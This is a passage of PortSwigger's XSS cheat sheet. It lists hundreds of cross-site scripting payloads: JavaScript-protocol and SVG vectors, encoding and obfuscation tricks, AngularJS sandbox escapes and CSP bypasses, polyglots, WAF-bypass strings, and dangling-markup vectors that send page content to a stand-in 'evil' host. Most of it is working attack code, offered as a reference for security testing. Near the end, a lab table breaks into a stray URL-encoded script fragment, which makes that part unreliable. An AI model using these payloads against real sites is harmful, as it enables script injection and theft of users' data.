Object data attribute with JavaScript protocol

<object data="javascript:alert(1)">

Embed src attribute with JavaScript protocol

<embed src="javascript:alert(1)">

A standard JavaScript protocol

<a href="javascript:alert(1)">XSS</a>

The protocol is not case sensitive

<a href="JaVaScript:alert(1)">XSS</a>

Characters \x01-\x20 are allowed before the protocol

<a href=" javascript:alert(1)">XSS</a>
Characters \x09,\x0a,\x0d are allowed inside the protocol
<a href="javas cript:alert(1)">XSS</a>

Characters \x09,\x0a,\x0d are allowed after protocol name before the colon
<a href="javascript :alert(1)">XSS</a>

Xlink namespace inside SVG with JavaScript protocol

<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>

SVG animate tag using values

<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text
x=20 y=20>XSS</text></a>

SVG animate tag using to

<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a
id=xss><text x=20 y=20>XSS</text></a>

SVG set tag

<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text
x=20 y=20>XSS</text></a>

Data protocol inside script src

<script src="data:text/javascript,alert(1)"></script>

SVG script href attribute without closing script tag

<svg><script href="data:text/javascript,alert(1)" />

SVG use element Chrome/Firefox

<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'
xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a
xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100'
/></a></svg>#x"></use></svg>

Import statement with data URL

<script>import('data:text/javascript,alert(1)')</script>
Base tag with JavaScript protocol rewriting relative URLS
<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>

MathML makes any tag clickable

<math><x href="javascript:alert(1)">blah

Button and formaction

<form><button formaction=javascript:alert(1)>XSS

Input and formaction

<form><input type=submit formaction=javascript:alert(1) value=XSS>

Form and action

<form action=javascript:alert(1)><input type=submit value=XSS>

Use element with an external URL

<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>

Animate tag with keytimes and multiple values

<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1
values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20
y=20>XSS</text></a>

Other useful attributes

Using srcdoc attribute
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Using srcdoc with entities

<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Click a submit element from anywhere on the page, even outside the form
<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>

Hidden inputs: Access key attributes can enable XSS on normally unexploitable
elements
<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows)
(CTRL+ALT+X on OS X)

Link elements: Access key attributes can enable XSS on normally unexploitable
elements
<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows)
(CTRL+ALT+X on OS X)

Download attribute can save a copy of the current webpage

<a href=# download="filename.html">Test</a>

Disable referrer using referrerpolicy

<img referrerpolicy="no-referrer" src="//portswigger-labs.net">

Set window.name via parameter on the window.open function

<a href=# onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?
context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>

Set window.name via name attribute in a <iframe> tag

<iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=
%27;eval(name)//"></iframe>

Set window.name via target attribute in a <base> tag

<base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?
context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>

Set window.name via target attribute in a <a> tag

<a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?
context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>

Set window.name via usemap attribute in a <img> tag

<img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area
shape="rect" coords="0,0,82,126" target="alert(1)"
href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=
%27;eval(name)//"></map>

Set window.name via target attribute in a <form> tag

<form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input
type=hidden name=x value="';eval(name)//"><input type=hidden name=context
value=js_string_single><input type="submit" value="XSS via target in a form"></form>

Set window.name via formtarget attribute in a <input> tag type submit

<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context
value=js_string_single><input type="submit"
formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS
via formtarget in input type submit"></form>

Set window.name via formtarget attribute in a <input> tag type image

<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context
value=js_string_single><input name=1 type="image" src="validimage.png"
formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS
via formtarget in input type image"></form>

Special tags
Redirect to a different domain
<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">

Meta charset attribute UTF-7

<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Meta charset UTF-7

<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-
alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (Has to be at the start of the document) 1

+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (Has to be at the start of the document) 2

+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (Has to be at the start of the document) 3

+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (Has to be at the start of the document) 4

+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Upgrade insecure requests

<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">

Disable JavaScript via iframe sandbox

<iframe sandbox src="//portswigger-labs.net"></iframe>

Disable referer
<meta name="referrer" content="no-referrer">

Encoding
Overlong UTF-8
%C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script>
%F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)</script> %FC
%80%80%80%80%BCscript>alert(1)</script>

Unicode escapes
<script>\u0061lert(1)</script>

Unicode escapes ES6 style

<script>\u{61}lert(1)</script>

Unicode escapes ES6 style zero padded

<script>\u{0000000061}lert(1)</script>

Hex encoding JavaScript escapes

<script>eval('\x61lert(1)')</script>

Octal encoding
<script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script>
<script>eval('alert(\61)')</script>

Decimal encoding with optional semi-colon

<a href="javascript:alert(1)">XSS</a><a href="&#106avascript:alert(1)">XSS</a>
SVG script with HTML encoding
<svg><script>alert(1)</script></svg> <svg><script>alert(1)</script></svg>
<svg><script>alert&NewLine;(1)</script></svg>
<svg><script>x="",alert(1)//";</script></svg>

Decimal encoding with padded zeros

<a href="&#0000106avascript:alert(1)">XSS</a>

Hex encoding entities

<a href="javascript:alert(1)">XSS</a>

Hex encoding without semi-colon provided next character is not a-f0-9

<a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a
href="&#x6a avascript:alert(1)">XSS</a>

Hex encoding with padded zeros

<a href="&#x0000006a;avascript:alert(1)">XSS</a>

Hex encoding is not case sensitive

<a href="&#X6A;avascript:alert(1)">XSS</a>

HTML entities
<a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a
href="java&NewLine;script:alert(1)">XSS</a> <a
href="javascript&colon;alert(1)">XSS</a>

URL encoding
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>

HTML entities and URL encoding

<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>

Obfuscation
Data protocol inside script src with base64
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
Data protocol inside script src with base64 and HTML entities
<script
src=data:text/javascript;base64,YWxlcnQoM
Sk=></script>

Data protocol inside script src with base64 and URL encoding
<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></
script>

Iframe srcdoc HTML encoded

<iframe srcdoc=<script>alert(1)</script>></iframe>

Iframe JavaScript URL with HTML and URL encoding

<iframe
src="javascript:'%3Cscript%3
Ealert(1)%3C%
2Fscript%3E'"></iframe>

SVG script with unicode escapes and HTML encoding

<svg><script>\u0061\u006&
#x63;\u0065\u0072&#
x5c;u0074(1)</script></svg>

Client-side template injection

VueJS reflected
Version:
Author:
Length:
Vector:
Copy:
All versions
Mario Heiderich (Cure53)
41
{{constructor.constructor('alert(1)')()}}

All versions
Mario Heiderich (Cure53) & Sebastian Lekies (Google) Eduardo Vela
Nava (Google) Krzysztof Kotowicz (Google)
62
<div v-html="''.constructor.constructor('alert(1)')()">a</div>

All versions
Gareth Heyes (PortSwigger)
39
<x v-html=_c.constructor('alert(1)')()>

All versions
Peter af Geijerstam (Swedish Shellcode Factory)
37
<x v-if=_c.constructor('alert(1)')()>

AngularJS sandbox escapes reflected

Version:
Author:
Length:
Vector:
Copy:
1.0.1 - 1.1.5
Mario Heiderich (Cure53)
41
{{constructor.constructor('alert(1)')()}}

1.0.1 - 1.1.5 (shorter)

Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys)
33
{{$on.constructor('alert(1)')()}}

1.2.0 - 1.2.1
Jan Horn (Google)
122
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).
value,0,'alert(1)')()}}

1.2.2 - 1.2.5
Gareth Heyes (PortSwigger)
23
{{{}.")));alert(1)//"}}
1.2.6 - 1.2.18
Jan Horn (Google)
106
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')
()}}

1.2.19 - 1.2.23
Mathias Karlsson (Detectify)
124
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;
["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29
Gareth Heyes (PortSwigger)
23
{{{}.")));alert(1)//"}}

1.2.27-1.2.29/1.3.0-1.3.20
Gareth Heyes (PortSwigger)
23
{{{}.")));alert(1)//"}}

1.3.0
Gábor Molnár (Google)
272
{{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a =
apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' +
'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )));}}

1.3.3 - 1.3.18
Gareth Heyes (PortSwigger)
128
{{{}[{toString:
[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//');}}

1.3.19
Gareth Heyes (PortSwigger)
102
{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}

1.3.20
Gareth Heyes (PortSwigger)
65
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9
Gareth Heyes (PortSwigger)
74
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

1.5.0 - 1.5.8
Ian Hickey & Gareth Heyes (PortSwigger)
79
{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}

1.5.9 - 1.5.11
Jan Horn (Google)
517
{{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$
$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.
$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,
$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }}

>=1.6.0
Mario Heiderich (Cure53)
41
{{constructor.constructor('alert(1)')()}}

>=1.6.0 (shorter)
Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys)
33
{{$on.constructor('alert(1)')()}}

DOM based AngularJS sandbox escapes

(Using orderBy or no $eval)
Version:
Author:
Length:
Vector:
Copy:
1.0.1 - 1.1.5
Mario Heiderich (Cure53)
37
constructor.constructor('alert(1)')()

1.2.0 - 1.2.18
Jan Horn (Google)
118
a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).va
lue,0,'alert(1)')()

1.2.19 - 1.2.23
Mathias Karlsson (Detectify)
119
toString.constructor.prototype.toString=toString.constructor.prototype.call;
["a","alert(1)"].sort(toString.constructor)

1.2.24 - 1.2.26
Gareth Heyes (PortSwigger)
317
{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}
[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]
['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',
{value:false});{}[['__proto__']]['y'].value('alert(1)')()

1.2.27-1.2.29/1.3.0-1.3.20
Gareth Heyes (PortSwigger)
20
{}.")));alert(1)//";

1.4.0-1.4.5
Gareth Heyes (PortSwigger)
75
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0
Mario Heiderich (Cure53)
37
constructor.constructor('alert(1)')()

1.4.4 (without strings)

Gareth Heyes (PortSwigger)
134
toString().constructor.prototype.charAt=[].join; [1,2]|
orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

AngularJS CSP bypasses

Version:
Author:
Length:
Vector:
Copy:
All versions (Chrome)
Gareth Heyes (PortSwigger)
81
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">

All versions (Chrome) shorter

Gareth Heyes (PortSwigger)
56
<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>

All versions (all browsers) shorter

Gareth Heyes (PortSwigger)
91
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

1.2.0 - 1.5.0
Eduardo Vela (Google)
190
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key,
value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1);
}}</div></div></div>
All versions (Chrome) shorter via oncut
Savan Gadhiya (NotSoSecure)
49
<input ng-cut=$event.path|orderBy:'(y=alert)(1)'>

Scriptless attacks
Dangling markup
Background attribute
<body background="//evil? <table background="//evil? <table><thead background="//evil?
<table><tbody background="//evil? <table><tfoot background="//evil? <table><td
background="//evil? <table><th background="//evil?

Link href stylesheet

<link rel=stylesheet href="//evil?

Link href icon

<link rel=icon href="//evil?

Meta refresh
<meta http-equiv="refresh" content="0; http://evil?

Img to pass markup through src attribute

<img src="//evil? <image src="//evil?

Video using track element

<video><track default src="//evil?

Video using source element and src attribute

<video><source src="//evil?

Audio using source element and src attribute

<audio><source src="//evil?

Input src
<input type=image src="//evil?
Button using formaction
<form><button style="width:100%;height:100%" type=submit formaction="//evil?

Input using formaction

<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit
formaction="//evil?

Form using action

<button form=x style="width:100%;height:100%;"><form id=x action="//evil?

Object data
<object data="//evil?

Iframe src
<iframe src="//evil?

Embed src
<embed src="//evil?

Use textarea to consume markup and post to external site

<form><button formaction=//evil>XSS</button><textarea name=x>

Pass markup data through window.name using form target

<button form=x>XSS</button><form id=x action=//evil target='

Pass markup data through window.name using base target

<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100
color=red>You must click me</font></a><base target="

Pass markup data through window.name using formtarget

<form><input type=submit value="Click me"
formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="

Using base href to pass data

<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base
href="//evil/

Using embed window name to pass data from the page

<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using iframe window name to pass data from the page

<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using object window name to pass data from the page

<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using frame window name to pass data from the page

<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Overwrite type attribute with image in hidden inputs

<input type=hidden type=image src="//evil?

Polyglots
Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/
[*/[]/+alert(1)//'>

Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></
script><html \" onmouseover=/*<svg/*/onload=alert()//>

Polyglot payload 3
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/
onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>

WAF bypass global objects

XSS into a JavaScript string: string concatenation (window)
';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);//

XSS into a JavaScript string: string concatenation (self)

';self['ale'+'rt'](self['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (this)
';this['ale'+'rt'](this['doc'+'ument']['dom'+'ain']);//

XSS into a JavaScript string: string concatenation (top)

';top['ale'+'rt'](top['doc'+'ument']['dom'+'ain']);//

XSS into a JavaScript string: string concatenation (parent)

';parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain']);//

XSS into a JavaScript string: string concatenation (frames)

';frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain']);//

XSS into a JavaScript string: string concatenation (globalThis)

';globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain']);//

XSS into a JavaScript string: comment syntax (window)

';window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain']);//

XSS into a JavaScript string: comment syntax (self)

';self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain']);//

XSS into a JavaScript string: comment syntax (this)

';this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain']);//

XSS into a JavaScript string: comment syntax (top)

';top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain']);//

XSS into a JavaScript string: comment syntax (parent)

';parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain']);//

XSS into a JavaScript string: comment syntax (frames)

';frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain']);//

XSS into a JavaScript string: comment syntax (globalThis)

';globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: hex escape sequence (window)
';window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\
x69\x6e']);//

XSS into a JavaScript string: hex escape sequence (self)

';self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\
x6e']);//

XSS into a JavaScript string: hex escape sequence (this)

';this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\
x6e']);//

XSS into a JavaScript string: hex escape sequence (top)

';top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\
x6e']);//

XSS into a JavaScript string: hex escape sequence (parent)

';parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\
x6e']);//

XSS into a JavaScript string: hex escape sequence (frames)

';frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\
x69\x6e']);//

XSS into a JavaScript string: hex escape sequence (globalThis)

';globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\
x61\x69\x6e']);//

XSS into a JavaScript string: hex escape sequence and base64 encoded string
(window)
';window['\x65\x76\x61\x6c']('window["\x61\x6c\x65\x72\x74"](window["\x61\x74\x6f\x62"]
("WFNT"))');//

XSS into a JavaScript string: hex escape sequence and base64 encoded string
(self)
';self['\x65\x76\x61\x6c']('self["\x61\x6c\x65\x72\x74"](self["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string
(this)
';this['\x65\x76\x61\x6c']('this["\x61\x6c\x65\x72\x74"](this["\x61\x74\x6f\x62"]("WFNT"))');//

XSS into a JavaScript string: hex escape sequence and base64 encoded string (top)
';top['\x65\x76\x61\x6c']('top["\x61\x6c\x65\x72\x74"](top["\x61\x74\x6f\x62"]("WFNT"))');//

XSS into a JavaScript string: hex escape sequence and base64 encoded string
(parent)
';parent['\x65\x76\x61\x6c']('parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\x62"]
("WFNT"))');//

XSS into a JavaScript string: hex escape sequence and base64 encoded string
(frames)
';frames['\x65\x76\x61\x6c']('frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\x62"]
("WFNT"))');//

XSS into a JavaScript string: hex escape sequence and base64 encoded string
(globalThis)
';globalThis['\x65\x76\x61\x6c']('globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x61\x74\x6f\
x62"]("WFNT"))');//

XSS into a JavaScript string: octal escape sequence (window)

';window['\141\154\145\162\164']('\130\123\123');//

XSS into a JavaScript string: octal escape sequence (self)

';self['\141\154\145\162\164']('\130\123\123');//

XSS into a JavaScript string: octal escape sequence (this)

';this['\141\154\145\162\164']('\130\123\123');//

XSS into a JavaScript string: octal escape sequence (top)

';top['\141\154\145\162\164']('\130\123\123');//

XSS into a JavaScript string: octal escape sequence (parent)

';parent['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (frames)
';frames['\141\154\145\162\164']('\130\123\123');//

XSS into a JavaScript string: octal escape sequence (globalThis)

';globalThis['\141\154\145\162\164']('\130\123\123');//

XSS into a JavaScript string: unicode escape (window)

';window['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//

XSS into a JavaScript string: unicode escape (self)

';self['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//

XSS into a JavaScript string: unicode escape (this)

';this['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//

XSS into a JavaScript string: unicode escape (top)

';top['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//

XSS into a JavaScript string: unicode escape (parent)

';parent['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//

XSS into a JavaScript string: unicode escape (frames)

';frames['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//

XSS into a JavaScript string: unicode escape (globalThis)

';globalThis['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//

XSS into a JavaScript string: RegExp source property (window)

';window[/al/.source+/ert/.source](/XSS/.source);//

XSS into a JavaScript string: RegExp source property (self)

';self[/al/.source+/ert/.source](/XSS/.source);//

XSS into a JavaScript string: RegExp source property (this)

';this[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (top)
';top[/al/.source+/ert/.source](/XSS/.source);//

XSS into a JavaScript string: RegExp source property (parent)

';parent[/al/.source+/ert/.source](/XSS/.source);//

XSS into a JavaScript string: RegExp source property (frames)

';frames[/al/.source+/ert/.source](/XSS/.source);//

XSS into a JavaScript string: RegExp source property (globalThis)

';globalThis[/al/.source+/ert/.source](/XSS/.source);//

XSS into a JavaScript string: Hieroglyphy/JSFuck (window)

';window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+
[]]]((+{}+[])[+!![]]);//

XSS into a JavaScript string: Hieroglyphy/JSFuck (self)

';self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+
{}+[])[+!![]]);//

XSS into a JavaScript string: Hieroglyphy/JSFuck (this)

';this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+
{}+[])[+!![]]);//

XSS into a JavaScript string: Hieroglyphy/JSFuck (top)

';top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+
{}+[])[+!![]]);//

XSS into a JavaScript string: Hieroglyphy/JSFuck (parent)

';parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]
((+{}+[])[+!![]]);//

XSS into a JavaScript string: Hieroglyphy/JSFuck (frames)

';frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]
((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (globalThis)
';globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+
[]]]((+{}+[])[+!![]]);//

Impossible labs
Title Description Length Closest vector Link
limit
Basic context, This lab captures the scenario when N/A N/A 🔗
WAF blocks you can't use an open tag followed by
<[a-zA-Z] an alphanumeric character.
Sometimes you can solve this problem
by bypassing the WAF entirely, but
what about when that's not an option?
Certain versions of .NET have this
behaviour, and it's only known to be
exploitable in old IE with <%tag.
Script based We often encounter this situation in N/A N/A 🔗
injection but the wild: you have an injection inside
quotes, a JavaScript variable and can inject
forward slash angle brackets, but quotes and
and backslash forward/backslashes are escaped so
are escaped you can't simply close the script
block.

The closest we've got to solving this is

when you have multiple injection
points. The first within a script based
context and the second in HTML.
innerHTML You have a site that processes the N/A N/A 🔗
context but no query string and URL decodes the
equals allowed parameters but splits on the equals
then assigns to innerHTML. In this
context <script> doesn't work and we
can't use = to create an event.
Basic context This lab's injection occurs within the 15 <q oncut=alert`` 🔗
length limit basic HTML context but has a length
limitation of 15. Filedescriptor came
up with a vector that could execute
JavaScript in 16 characters: <q
oncut=alert`` but can you beat it?
Attribute The context of this lab inside an 14 "oncut=alert`` 🔗
context length attribute with a length limitation of 14
limit characters. We came up with a vector
%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D
%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src
%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName
%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B
%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings
%3E)" />

CSS expressions <=IE7

<div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div
style=xss:expressio\6e(alert(1))> <div style=xss:expressio\006e(alert(1))> <div style=xss:expressio\
00006e(alert(1))> <div style=xss:expressio\6e(alert(1))> <div
style=xss:expressio\6e(alert(1))>

In quirks mode IE allowed you to use = instead of :

<div style=xss=expression(alert(1))> <div style="color&#x3dred">test</div>

Behaviors for older modes of IE

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions

<script> function window.onload(){ alert(1); } </script> <script> function window::onload()
{ alert(1); } </script> <script> function window.location(){ } </script> <body> <script>
function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body>
<body> <script> function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>"; }
</script> </body>

GreyMagic HTML+time exploit (no longer works even in 5 docmode)

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import
namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML"
to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>

Firefox allows NULLS after &

<a href="javascriptjavascript:alert(1)">Firefox</a>

Firefox allows NULLs inside named entities

<a href="javascript&colon;alert(1)">Firefox</a>

Firefox allows NULL characters inside opening comments

<iframe/onload=alert(1)>"> --> <iframe/onload=alert(1)>"> -->

Safari used to allow any tag to have a onload event inside SVG
<svg><xss onload=alert(1)>

Isindex using src attribute

<isindex type=image src="//evil?

Isindex using submit

<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?

Isindex and formaction

<isindex type=submit formaction=javascript:alert(1)>

Isindex and action

<isindex type=submit action=javascript:alert(1)>

Credits

Brought to you by PortSwigger lovingly constructed by Gareth Heyes

This cheat sheet wouldn't be possible without the web security community who
share their research. Big thanks to: James Kettle, Mario Heiderich, Eduardo
Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias
Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a,
Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan,
Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal
Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof
